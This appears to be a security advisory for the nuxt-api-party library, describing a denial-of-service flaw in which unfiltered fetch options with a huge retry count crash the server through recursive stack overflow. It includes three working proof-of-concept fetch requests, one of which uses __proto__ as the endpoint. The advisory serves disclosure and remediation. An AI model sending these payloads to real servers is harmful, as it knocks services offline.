CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
AI Score
Confidence
High
EPSS
Percentile
17.0%
nuxt-api-party
allows developers to proxy requests to an API without exposing credentials to the client. ofetch
is used to send the requests.
The library allows the user to send many options directly to ofetch
. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow.
fetchOptions
are obtained directly from the request body. These are then passed directly into ofetch
.
We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively.
POC using Node.
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "x:x", retry: 9999999 }),
headers: { "Content-Type": "application/json" }
})
We can use __proto__
as a substitute for the endpoint if it is not known.
await fetch("http://localhost:3000/api/__api_party/__proto__", {
method: "POST",
body: JSON.stringify({ path: "x:x", retry: 9999999 }),
headers: { "Content-Type": "application/json" }
})
We can build the size of the stack faster by using more complicated URIs
await fetch("http://localhost:3000/api/__api_party/__proto__", {
method: "POST",
body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }),
headers: { "Content-Type": "application/json" }
})
Full DOS, server is unusable during attack. Requires a single request.
Limit which options can be passed to ofetch
.
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
AI Score
Confidence
High
EPSS
Percentile
17.0%